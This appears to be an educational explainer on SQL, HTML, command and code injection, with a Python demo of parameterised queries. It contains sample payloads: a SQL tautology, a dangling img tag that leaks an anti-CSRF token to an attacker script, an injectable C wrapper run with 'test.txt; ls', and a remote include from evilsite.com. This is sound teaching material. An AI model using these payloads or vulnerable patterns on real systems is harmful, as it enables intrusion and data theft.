Injection
Injection attacks occur when an attacker is able to send commands through a web server to a backend system, bypassing normal security controls and fooling the backend system into believing that the request came from the web server.
SQL
SQL injection is the most common web hacking technique. A SQL injection consists of injecting a malicious SQL statement, typically through a web form, into the SQL interpreter of the application.
Example
Submitting the value Smith' OR '1' = '1' as the name results in SELECT * FROM users WHERE name = 'Smith' OR TRUE; (the injected '1' = '1' comparison is always true). Because the WHERE clause is always satisfied, the statement returns every entry in the users table.
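The following added example (not code from the original page) reproduces the effect on an in-memory SQLite table: the same Smith' OR '1' = '1 input returns every row when the query is built by string concatenation, and nothing when the value is passed as a bound parameter. The table contents and function names are constructed for the example.

```python
import sqlite3

# Constructed sample data for the demonstration; not from the original page.
USERS = [
    ("Smith", "smith@example.test"),
    ("Jones", "jones@example.test"),
    ("Lee", "lee@example.test"),
]


def make_db():
    """Create an in-memory users table holding the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def find_user_vulnerable(conn, name):
    """Builds the statement by concatenation, so a quote inside `name`
    terminates the string literal and the rest becomes SQL syntax."""
    sql = "SELECT * FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, name):
    """Binds `name` as a parameter: the driver treats it purely as data,
    so quotes and keywords in it can never change the query structure."""
    return conn.execute("SELECT * FROM users WHERE name = ?", (name,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    # The application's own closing quote completes the injected '1' = '1'.
    payload = "Smith' OR '1' = '1"
    print(find_user_vulnerable(conn, "Smith"))   # one row
    print(find_user_vulnerable(conn, payload))   # all three rows: WHERE is always true
    print(find_user_safe(conn, payload))         # []: no user literally has that name
```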
HTML
HTML injection is very similar to XSS. The injection is performed the same way, except that the injected content consists of plain HTML tags, whereas XSS injects script.
HTML injection can result in changing the webpage and harming the reputation of the page, exfiltrating sensitive user data, exfiltrating anti-CSRF tokens, and exfiltrating passwords stored in the browser.
Examples
To exfiltrate an anti-CSRF token, the attacker may, for example, use a non-terminated <img> tag such as:
<img src='http://example.com/record.php?
The missing closing single quote causes the rest of the page content to become part of the URL until another single quote is found. If the legitimate markup uses double quotes instead, the hidden input that follows is appended to the URL, sent to the attacker-controlled record.php script and recorded:
<img src='http://example.com/record.php?<input type="hidden" name="anti_xsrf" value="s74bogj63h">
Command
Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.
Examples
The following code is a wrapper around the UNIX command cat which prints the contents of a file to standard output. It is also injectable:
#include <stdio.h>
#include <stdlib.h>   /* malloc, free, system */
#include <string.h>   /* strlen, strncpy, strncat */
#include <unistd.h>

int main(int argc, char **argv) {
    char cat[] = "cat ";
    char *command;
    size_t commandLength;

    if (argc < 2) {
        fprintf(stderr, "usage: %s <file>\n", argv[0]);
        return 1;
    }
    /* "cat " + the user-supplied argument + terminating NUL */
    commandLength = strlen(cat) + strlen(argv[1]) + 1;
    command = (char *) malloc(commandLength);
    strncpy(command, cat, commandLength);
    strncat(command, argv[1], (commandLength - strlen(cat)));
    /* argv[1] is passed to /bin/sh unescaped, so shell metacharacters
       such as ';' in it are interpreted as command separators */
    system(command);
    free(command);
    return (0);
}
Used normally, the output is simply the contents of the file requested:
$ ./catWrapper test.txt
test
However, if we add a semicolon and another command to the end of this line, the command is executed by catWrapper with no complaint:
$ ./catWrapper "test.txt; ls"
test
test.txt
format.c
catWrapper*
a.out*
If catWrapper had been set to have a higher privilege level than the standard user, arbitrary commands could be executed with that higher privilege.
Code
Code Injection is the general term for attack types which consist of injecting code that is then interpreted/executed by the application. This type of attack exploits poor handling of untrusted data. These types of attacks are usually made possible due to a lack of proper input/output data validation, for example:
- allowed characters (standard regular expressions classes or custom)
- data format
- amount of expected data
Examples
If an application passes a parameter sent via a GET request to the PHP include() function with no input validation, the attacker may try to execute code other than what the developer had in mind.
The URL below passes a page name to the include() function.
http://testsite.com/index.php?page=contact.php
The file “evilcode.php” may contain, for example, the phpinfo() function which is useful for gaining information about the configuration of the environment in which the web service runs. An attacker can ask the application to execute their PHP code using the following request:
http://testsite.com/?page=http://evilsite.com/evilcode.php